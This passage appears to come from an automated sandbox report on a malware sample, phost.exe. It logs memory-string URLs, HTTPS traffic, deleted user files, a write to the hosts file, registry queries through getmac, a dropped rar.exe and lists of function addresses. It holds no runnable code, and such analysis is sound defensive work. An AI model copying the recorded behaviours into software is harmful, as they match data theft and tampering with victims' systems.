              Source: phost.exe, 00000001.00000002.2178106775.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704518164.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2175758589.000001AE1D383000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177552719.000001AE1D385000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\phost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\WUTJSCBCFX.pngJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.jpgJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LTKMYBSEYZ.jpgJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\UOOJJOZIRH.mp3Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\KZWFNRXYKI.jpgJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: conhost.exeProcess created: 42
              Source: cmd.exeProcess created: 71

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,105_2_00007FF6BBCD3A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,105_2_00007FF6BBCFB57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC710000_2_00007FF62CC71000
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC969D40_2_00007FF62CC969D4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC78BD00_2_00007FF62CC78BD0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC836100_2_00007FF62CC83610
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC81DC40_2_00007FF62CC81DC4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8E5E00_2_00007FF62CC8E5E0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC85DA00_2_00007FF62CC85DA0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC89F100_2_00007FF62CC89F10
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC95EEC0_2_00007FF62CC95EEC
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC888040_2_00007FF62CC88804
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC81FD00_2_00007FF62CC81FD0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC817B00_2_00007FF62CC817B0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC997980_2_00007FF62CC99798
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8DF600_2_00007FF62CC8DF60
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC9411C0_2_00007FF62CC9411C
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC918E40_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC798700_2_00007FF62CC79870
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC83A140_2_00007FF62CC83A14
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC821D40_2_00007FF62CC821D4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC819B40_2_00007FF62CC819B4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC881540_2_00007FF62CC88154
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC909380_2_00007FF62CC90938
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8DACC0_2_00007FF62CC8DACC
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC81BC00_2_00007FF62CC81BC0
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7A34B0_2_00007FF62CC7A34B
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7AD1D0_2_00007FF62CC7AD1D
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7A4E40_2_00007FF62CC7A4E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC909380_2_00007FF62CC90938
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC964880_2_00007FF62CC96488
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC93C800_2_00007FF62CC93C80
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC82C800_2_00007FF62CC82C80
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC95C700_2_00007FF62CC95C70
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC710001_2_00007FF62CC71000
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC969D41_2_00007FF62CC969D4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC836101_2_00007FF62CC83610
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC81DC41_2_00007FF62CC81DC4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC8E5E01_2_00007FF62CC8E5E0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC85DA01_2_00007FF62CC85DA0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC89F101_2_00007FF62CC89F10
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC95EEC1_2_00007FF62CC95EEC
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC888041_2_00007FF62CC88804
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC81FD01_2_00007FF62CC81FD0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC817B01_2_00007FF62CC817B0
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC997981_2_00007FF62CC99798
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC8DF601_2_00007FF62CC8DF60
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC9411C1_2_00007FF62CC9411C
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC918E41_2_00007FF62CC918E4
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC798701_2_00007FF62CC79870
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC83A141_2_00007FF62CC83A14
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 74_2_00007FFD9A9E17D974_2_00007FFD9A9E17D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBABA0105_2_00007FF6BBCBABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE7B24105_2_00007FF6BBCE7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC0A2C105_2_00007FF6BBCC0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDAE10105_2_00007FF6BBCDAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC54C0105_2_00007FF6BBCC54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB82F0105_2_00007FF6BBCB82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC1180105_2_00007FF6BBCC1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB1884105_2_00007FF6BBCB1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBB540105_2_00007FF6BBCBB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD06D0C105_2_00007FF6BBD06D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD9D0C105_2_00007FF6BBCD9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBDD04105_2_00007FF6BBCBDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0D20105_2_00007FF6BBCE0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF5C8C105_2_00007FF6BBCF5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC8C30105_2_00007FF6BBCC8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD09B98105_2_00007FF6BBD09B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF4B38105_2_00007FF6BBCF4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBCB14105_2_00007FF6BBCBCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD1AAC0105_2_00007FF6BBD1AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF5A70105_2_00007FF6BBCF5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEFA6C105_2_00007FF6BBCEFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF69FD105_2_00007FF6BBCF69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB49B8105_2_00007FF6BBCB49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDD97C105_2_00007FF6BBCDD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD0104105_2_00007FF6BBCD0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD100F0105_2_00007FF6BBD100F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE8040105_2_00007FF6BBCE8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0074105_2_00007FF6BBCE0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDC05C105_2_00007FF6BBCDC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEC00C105_2_00007FF6BBCEC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC3030105_2_00007FF6BBCC3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD1DFD8105_2_00007FF6BBD1DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF4FE8105_2_00007FF6BBCF4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD1AF90105_2_00007FF6BBD1AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE5F4C105_2_00007FF6BBCE5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEAF0C105_2_00007FF6BBCEAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB9EFC105_2_00007FF6BBCB9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBCE84105_2_00007FF6BBCBCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFEEA4105_2_00007FF6BBCFEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCFAE50105_2_00007FF6BBCFAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0FE74105_2_00007FF6BBD0FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC8E68105_2_00007FF6BBCC8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBEE08105_2_00007FF6BBCBEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC1E04105_2_00007FF6BBCC1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD01DCC105_2_00007FF6BBD01DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF9D74105_2_00007FF6BBCF9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBA504105_2_00007FF6BBCBA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF5468105_2_00007FF6BBCF5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDD458105_2_00007FF6BBCDD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDC3E0105_2_00007FF6BBCDC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0374105_2_00007FF6BBCE0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC2360105_2_00007FF6BBCC2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD01314105_2_00007FF6BBD01314
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0832C105_2_00007FF6BBD0832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCD2C0105_2_00007FF6BBCCD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB42E0105_2_00007FF6BBCB42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF02A4105_2_00007FF6BBCF02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCBF24C105_2_00007FF6BBCBF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD7244105_2_00007FF6BBCD7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD02268105_2_00007FF6BBD02268
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCCE21C105_2_00007FF6BBCCE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF81CC105_2_00007FF6BBCF81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD141CC105_2_00007FF6BBD141CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF2164105_2_00007FF6BBCF2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF190C105_2_00007FF6BBCF190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE0904105_2_00007FF6BBCE0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCED91C105_2_00007FF6BBCED91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE38E8105_2_00007FF6BBCE38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC2890105_2_00007FF6BBCC2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCB8884105_2_00007FF6BBCB8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD018A8105_2_00007FF6BBD018A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC17C8105_2_00007FF6BBCC17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCD67E0105_2_00007FF6BBCD67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEA710105_2_00007FF6BBCEA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF0710105_2_00007FF6BBCF0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCF2700105_2_00007FF6BBCF2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC86C4105_2_00007FF6BBCC86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD186D4105_2_00007FF6BBD186D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD07660105_2_00007FF6BBD07660
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0260C105_2_00007FF6BBD0260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCE65FC105_2_00007FF6BBCE65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCDF5B0105_2_00007FF6BBCDF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCEF59C105_2_00007FF6BBCEF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBCC8598105_2_00007FF6BBCC8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: String function: 00007FF6BBCF49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: String function: 00007FF6BBCC8444 appears 48 times
              Source: C:\Users\user\Desktop\phost.exeCode function: String function: 00007FF62CC72910 appears 34 times
              Source: C:\Users\user\Desktop\phost.exeCode function: String function: 00007FF62CC72710 appears 90 times
              Source: phost.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: phost.exeBinary or memory string: OriginalFilename vs phost.exe
              Source: phost.exe, 00000000.00000003.1677087289.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1680316164.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1677482019.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1680438634.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs phost.exe
              Source: phost.exe, 00000000.00000003.1676333004.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1676118699.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1675971117.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000000.1675471373.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameupfc.exej% vs phost.exe
              Source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs phost.exe
              Source: phost.exe, 00000000.00000003.1676634666.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1677207017.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs phost.exe
              Source: phost.exe, 00000000.00000003.1681353706.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1676526490.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs phost.exe
              Source: phost.exe, 00000000.00000003.1677342281.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs phost.exe
              Source: phost.exeBinary or memory string: OriginalFilename vs phost.exe
              Source: phost.exe, 00000001.00000002.2185145953.00007FFE101E8000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2182666922.00007FFDFACA4000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs phost.exe
              Source: phost.exe, 00000001.00000002.2181402396.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameupfc.exej% vs phost.exe
              Source: phost.exe, 00000001.00000002.2185595747.00007FFE10318000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2185433236.00007FFE10263000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2186655028.00007FFE13344000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2187193296.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs phost.exe
              Source: phost.exe, 00000001.00000002.2183688641.00007FFDFB1A9000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs phost.exe
              Source: phost.exe, 00000001.00000002.2186219848.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2185833126.00007FFE1152C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2186051841.00007FFE126F4000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2184876730.00007FFE0EB62000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2181882290.00007FFDFAA5A000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs phost.exe
              Source: phost.exe, 00000001.00000002.2182303838.00007FFDFAB28000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibsslH vs phost.exe
